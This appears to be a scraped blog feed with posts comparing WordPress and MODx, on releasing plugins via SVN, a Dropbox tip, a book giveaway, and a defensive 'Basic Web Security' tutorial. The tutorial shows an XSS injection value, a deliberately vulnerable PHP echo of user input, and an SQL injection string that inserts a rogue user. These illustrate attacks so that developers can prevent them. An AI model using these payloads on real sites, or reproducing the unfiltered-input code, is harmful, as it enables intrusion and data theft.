In the same breath as support, I must mention documentation. In general, documentation for both systems is lacking, in some areas painfully so. While using WordPress, I have often I have searched for hours trying to find a way to do a certain thing, only to end up grepping through the code base and deciphering the raw code myself. Frequently the official documentation has holes or in some cases, it’s just plain wrong. The best resources for some advanced WordPress features are blogs written other developers.

MODx’s documentation is also frustratingly AWOL on a number of topics, but least the MODx code base is integrated with a standard documentation publishing system so if needed you can see for yourself how the functions are structured without having to grep through the code base. The vibrant MODx forums fill in a lot of the holes in the documentation, and that’s a huge benefit for any open-source project.


If you need support for your site, especially guaranteed support, then only MODx offers a paid support service; WordPress doesn’t offer a paid support option.


WordPress can handle a huge number of posts, but it does get bogged down with a large number of pages, and there are lots of whisperings about this (e.g. here). I suspect it has to do with WordPress’ convoluted templating system (see above), which makes me wonder what the limits are on custom post types.

MODx Evolution suffered from a limit of approximately 5000 resources (in MODx, pages and posts are types of resources), but that limit has been corrected in an upcoming release thanks largely to the efforts of Charlie over at

MODx Revolution has no such limits: it offers a great built-in caching system that allows it to serve pages very quickly. It has been benchmarked as twice as fast as Expression Engine (see this blog post).

More importantly, MODx Revolution was built with scaling in mind: it stores session data in the database, so it is easily deployed on load-balanced servers. This is hugely important if you are building a site that might one day get massive amounts of traffic; WordPress can be deployed like this, but such usage is not generally anticipated. I don’t know of many large commercial sites running WordPress (in fact, I only found one:


MODx is by far the more mature option here if you anticipate building a large site.


I do like both systems, and I use them both daily. WordPress has a much lighter footprint and is easier to use for a large number of use-cases: if you just need to get a site out the door fast, then WordPress is really hard to beat. WordPress is plug-and-play for just about everything and that saves you hours of setup time, so it can be the right solution for a majority of sites. But the more customizations you require (particularly in scripts or in layouts), then the more appealing MODx becomes: WordPress has thousands of plugins available, but if those aren’t meeting your needs, I’ve found certain types of customizations to be extremely difficult in WordPress whereas most often, MODx handles them with ease. Doing things like building web applications with strict formatting requirements is much easier in MODx because it’s built more as a launchpad for customizations: it’s really more of a content management framework (CMF). MODx Evolution is the best system I’ve used for building small to medium sized informational/brochure sites, WordPress rules as the blogging king, and I’ve been very impressed with how easily I can build web applications using MODx Revolution. There isn’t one tool that’s right for every job; the more projects you complete, the better idea you’ll have as to which system will accomplish your requirements more easily, and hopefully this article helps you spot more of what each system is good at.

]]> 25
Releasing New Versions of your WordPress Plugins Sat, 05 Mar 2011 08:40:22 +0000 Continue reading Releasing New Versions of your WordPress Plugins ]]> If you are a WordPress plugin developer, then this post is for you. There is very little documentation on how to effectively use the WordPress Subversion repository, and the repo architecture is critically flawed in its structure making “kosher” usage seem entirely buggy. Worse yet, the support in the WordPress forums is practically non-existant. For a more thorough explanation of this process, see our book on WordPress 3 Plugin Development Essentials, which features an entire chapter on dealing with SVN and the WordPress repository.

Below is the short summary of what is presented in the video.

How to release updates to your WordPress plugin (quickie version)

  1. Make the updates to your code, fix any errors, add new features.
  2. Update your plugin’s main file (the one with the information header) so that it references the new version of your plugin, e.g.
    Version: 0.5
  3. Update your readme.txt file to describe the changes you have made, but DO NOT change the Stable Tag. This number must point to an existing directory inside your repo’s tags directory.
  4. Save your files, then commit your changes to the SVN repo, e.g. svn commit . -m "My new version is ready"
  5. Tag the new version using the SVN copy command to copy the trunk new a new numbered directory in tags, e.g. svn copy
    Remember: the tagging operation is just a copy operation.
  6. By performing the tagging (i.e. copy) operation, a new directory has been created inside the tags directory. So only now can you safely update your readme.txt file’s Stable Tag, e.g.
    Stable tag: 0.5
    That number acts as a pointer to the corresponding folder inside of the tags directory (it would point to in this example).
  7. Commit your changes to the readme.txt file. This will ensure that the Stable Tag attribute points to the newly created version: svn commit . -m "Updating the stable tag"
  8. You should be done now, but the WordPress SVN repository has been so problematic…. keep an eye on your plugin’s download page and verify that the changes get picked up. The changes should be picked up within 15 minutes or so… if they don’t get picked up, look at the downloaded zip file carefully… does the link say one thing but the name of the zip file says something else? It’s easy to mix things up, so if you get stuck, try reviewing the steps here.

How to release updates to your WordPress plugin (Long Version)

Ok, that was too quick? Well, we left out some important geeky points. The way WordPress’ download page works is that it looks at the readme.txt file at the HEAD of the repo, and then it follows the value listed there for Stable tag. If the Stable tag lists version 0.8, then the information from tags/0.8/readme.txt is used to generate your plugin’s information page and the files in tags/0.8 are packaged up into a zip file and that’s what downloads when the user clicks the download link.

Can you see the problem with this setup? Normally, when you tag a directory in SVN, that copy is treated as a read-only reference, but in this setup, it is frequently easier and less prone to errors for you to go into the tags directory and make your edits. This is normally a bit no-no for version control!

So the safer way to do this is to develop your plugin normally inside the wp-content/plugins directory and submit to the trunk as you normally do. Once you’re ready to publish a release, go to a new folder somewhere on your hard drive and checkout your ENTIRE project, trunk, tags, and all. Then you can do your tagging operation locally, e.g. svn copy trunk tags/0.9, and that will give you a new directory. You can update that directory’s readme.txt file and your plugin’s information header, then commit all of your code (trunk and all tags folders).

Hope that helps los dudes.

]]> 4
Get a Free 250 MB Upgrade by Clicking the “Get Started” Tab in Dropbox Sat, 07 Aug 2010 18:17:12 +0000 Continue reading Get a Free 250 MB Upgrade by Clicking the “Get Started” Tab in Dropbox ]]> dropbox_gift I’ve been a happy Dropbox user since the private-beta was released a couple years ago. It’s by far my favorite file storage and syncing service, and it gives me peace of mind about backups of critical files.

If you’re an old-timer like me, you may not have noticed the Get Started tab when you log into your Dropbox web account. Click it and walk through the basic usage tutorial that it presents. When you’ve finished, you may receive a free 250 MB storage upgrade. It worked for me. More storage space is always appreciated.

If you don’t have a Dropbox account yet, you can receive two gigabytes of storage for free plus an extra 250 MB by using this signup link.

]]> 1
Basic Web Security Mon, 10 May 2010 18:00:51 +0000 Continue reading Basic Web Security ]]> Web security is a huge topic, and this article only intends to cover some of the most basic issues and increase awareness of how carelessness or ignorance can lead to exploits. Ultimately, what you don’t know can hurt you, so it’s in your best interest to learn as much as you can about your site and the technologies it relies on. Here’s a brief run-down of some fairly common mistakes I’ve come across and what you can do to either avoid them or lessen your vulnerability.

Suspected Malware Site!
You've been F'd in the A!

Make Rolling Backups

If you do nothing else, make sure you are backing up your site and its databases. So long as you know if/when your site fails (or is hacked) and have the ability to roll back to a known good state, you have little to fear.

Make SURE you practice restoring a site from your backups! An untested backup is worthless. Nothing is worse that THINKING you have a viable backup only to discover that it is actually corrupted.

As your backup needs mature, consider storing them offsite, e.g. on Amazon’s S3 service.

I’m supplying two of my most-used backup scripts for those in need. These are fairly simple, but they will work on shared hosts. They will backup a web site’s files and its databases.

Be Diligent about Passwords

You’ve probably heard this a hundred times before, but it is really important:

  • NEVER use the same password twice! Ever!
  • Avoid short passwords! Length before strength. Try mixing up combinations of smaller units, e.g. “AlphaBetaCharlie” instead of “abc”. Be creative. You can have strong passwords that are easy to remember!
  • Store your passwords in a safe place, e.g. in a password manager like KeePass or in an encrypted disc image
  • Change your Passwords Frequently! Literally, put this in your calendar so you remember to do it on a periodic basis. This helps avoid brute-force attacks.
  • As a secondary line of defense, you can put an .htaccess password on your manager pages. All this does is slow down a brute-force attack by forcing the attacker to crack an additional password.

Password Protecting Directories using .htaccess

This adds an additional layer of authentication to a site or to a page; it’s not meant to substitute for more robust firewall rules or active filtering, but it is easy to set up.

First, create a username and password in a file that .htaccess can read. This can be done on the bash command line using the htpasswd command:

htpasswd -c /path/to/htpassword/file name_of_user

Next, add the following to your .htaccess file. Be sure you reference the file you just created above:

AuthName "Protected Area"
AuthGroupFile /dev/null
AuthType Basic
AuthUserFile /path/to/htpassword/file
Require valid-user

For some more detailed information on .htaccess passwords, see this page.

Stay Patched

Make sure you’ve got an updated version of your operating system, your scripting language (PHP), your database (MySQL), and your software (WordPress, MODx, etc.). Sometimes applying patches can be scary, but it’s a lot less so if you’ve got those rolling backups in place!

I want to make mention of a very useful tool: SimpleScripts. It’s available on Bluehost accounts; it provides one-click installs of many web software packages (like WordPress and MODx) and it will alert you to update them when you log into your cPanel. It’s a real time-saver!

Clean your Room!

  • Do not install superfluous/untrusted software on your site! Don’t go dumpster diving for code that’s going to end up on a public-facing web site!
  • Shut down services you’re not using (e.g. blog posts) because it takes more time to secure them.
  • Do not store backups or sensitive data inside your document root!
  • Encrypt sensitive data
  • Check permissions.
Proper web site folder structure
Don't put backups or database dumps in your document root!

Make sure you organize your site’s files in a way that ensures that only you have access to sensitive data like backups or database dumps. These should NEVER be stored in the publicly viewable document root!

Cross Site Scripting

Behold the terror that is:

<?php print $_GET['x']; ?>

That code should NEVER be used on a public site because it effectively gives free access to the public to put whatever they want on your site! This type of code often sneaks into pagination links or into code that re-populates forms, e.g.:

<input type="text" name="myfield" value="<?php print $_POST['myfield']; ?>" />

where the ‘myfield’ variable contains something like:
" /> <script src=""></script>

For a list of values you might want to try pasting into form fields to see if they are secure, check out this great cheat sheet at

In the end, be REALLY aware of any user-submitted data. Users can put their own data into ANY form field, and into any cookie, so anything in the $_GET, $_POST, or $_COOKIE arrays (and also the $_REQUEST array) is inherently insecure and should be carefully filtered. These are like the STDs of the web!!!

For articles about web hacks and some good real-world examples, check out other articles on

Don’t Take Cookies From Strangers!

If you thought cookies were somehow immune to the area of security threats, they are not! It’s easy to write your own! The Firefox Web Developer plugin lets you easily create your own cookies. This is great as a web developer, but it can also be a sneaky tool for a hacker to introduce unintended code to your application, so filter cookie contents as carefully as you would the user-submitted forms.

Cookies also store the PHP session id; all $_SESSION data is stored on the server, but the unique key that associates that data with the user is stored in the user’s cookie. If one user authenticates, it’s possible for another user to make requests using that $_SESSION id! Especially with applications that require a login, it’s good practice to get a new session id using session_regenerate_id().

Filtering data

Every time you submit form data, you should write your regular expressions very carefully so your application accepts ONLY clean, valid data. In general, if you can keep input as simplistic as possible, it tends to be easier to secure. Integer only inputs are “safer” than alphabetic inputs. Alphabetic input is safer than input that accepts HTML tags, and so on.

Consider the following filters:
Type-Casting to force integer only values:
$x = (int) $_GET['x'];

Alphabetical Characters Only:

// Accepts only letters a-z (case insensitive)
function alphabetical($str)
if ( preg_match('/^([a-z])+$/i', $str) )
return $str;
return FALSE;

For PHP coders, get familiar with the preg_replace() function: it offers a more standard regular expression syntax (the often emulated Perl syntax). Also have a look at the strip_tags() function.

Frame Buster

A common trick used in phishing scams or to perpetrate click fraud involves iframe-ing a site. Basically, the “trick” relies on the HTML iFrame tag to make one site display the contents of another without being obvious to the casual user.

One partial solution to this common attack vector is to use some simple javascript that checks to ensure that the page the parent page and not being iFramed:

if (top.frames.length!=0)
// -->

Do a Google search for “frame buster javascript” to find other examples.

SQL Injection

This is a very broad topic, and there are numerous ways that SQL-injection might be used to compromise a site, but they all rely on the same principle: you construct strings of SQL statements and issue them against your database. If a malicious user is able to put his own data into one of those strings, it’s possible that a user can execute queries on your database that you never expected. This often gets back to form-validation and the ever important task of filtering user-submitted data!

Here’s a not-so-hypothetical PHP example:

$username = $_POST['username'];
$sql = "SELECT * FROM `users` WHERE `username`='$username'";

where $username contains something like:
'; INSERT INTO users (username, password) VALUES ('hacker_dude', MD5('xxxxxx') )

When that executes, 2 different queries are sent to the database instead of one, and if your’e not careful, it can allow an attacker to gain access to parts of your site and delete or steal data.

One strong line of defense against this type of attack is using a robust database driver that allows for the use of prepared statements (available since MySQL 4.1): where you prepare a statement once, then execute it multiple times with only certain defined variables changing. What this does is it allows you to define your query and only let the user supply the variables to be used in that query. This is a much more sensible option than letting the user essentially construct the query from scratch.

More mature database driver libraries (such as phpmysli) will allow you to use prepared statements.

You should also get familiar with escaping quotes in your database queries; this isn’t anywhere as effective as using prepared statements, but sometimes you have to use statements that aren’t prepared, so get familiar with how to escape strings before sending them to the database. In PHP, use the mysql_real_escape() function.

Finally, consider setting up special database users and roles to handle different types of queries. If a query is hijacked, it can only execute with the same permissions as the database handle. In other words, you wouldn’t grant delete or insert permissions to a database handle that was used only for selecting data. It’s more work to set up your database handles this way, but it may help prevent an attack from succeeding.


Watch your cornhole. There’s a lot going on a web site, and there are a lot of ways to abuse the technologies that run them. If you understand how the exploits occur, you’ll be better prepared to prevent them.

]]> 2
Book Announcement – WordPress 2.9 e-Commerce (plus a giveaway) Mon, 12 Apr 2010 02:01:46 +0000 Continue reading Book Announcement – WordPress 2.9 e-Commerce (plus a giveaway) ]]> Book cover - WordPress 2.9 e-Commerce In case you’ve been wondering why my number of posts dwindled in the last year, here is the reason: I’m pleased to announce the release of my first book, WordPress 2.9 e-Commerce, published through Packt Publishing.

As the name implies, this book works through the marriage of the popular WordPress software and the WP e-Commerce plugin offered by Like most of my writings, it’s a tutorial, though on a much grander scale than a simple post. 🙂

You can read all about it on Amazon, but suffice to say that this book is aimed toward anyone who wants to sell either physical goods or digital downloads using the familiar WordPress software. It’s a comprehensive overview, but I especially spend a lot of time discussing the nitty-gritty of payment setup (both PayPal and Google Checkout) as well as the myriad of shipping options and how to handle them.

It was exciting enough to send in the final revision earlier this year, but holding the complete book in my hands is a feeling beyond words to describe. I’m proud of this book, and I hope it helps budding entrepreneurs and hobbyists alike.

Book Giveaway

And now I’d like you to hold the book in your hands! I have two copies to give away, and will gladly mail them at my expense to two readers. To enter, all you have to do is leave a comment on this post. On Monday, 19 April 2010, I will randomly select two winners and notify them. I will ship worldwide, so anyone can enter.

Good luck!

]]> 11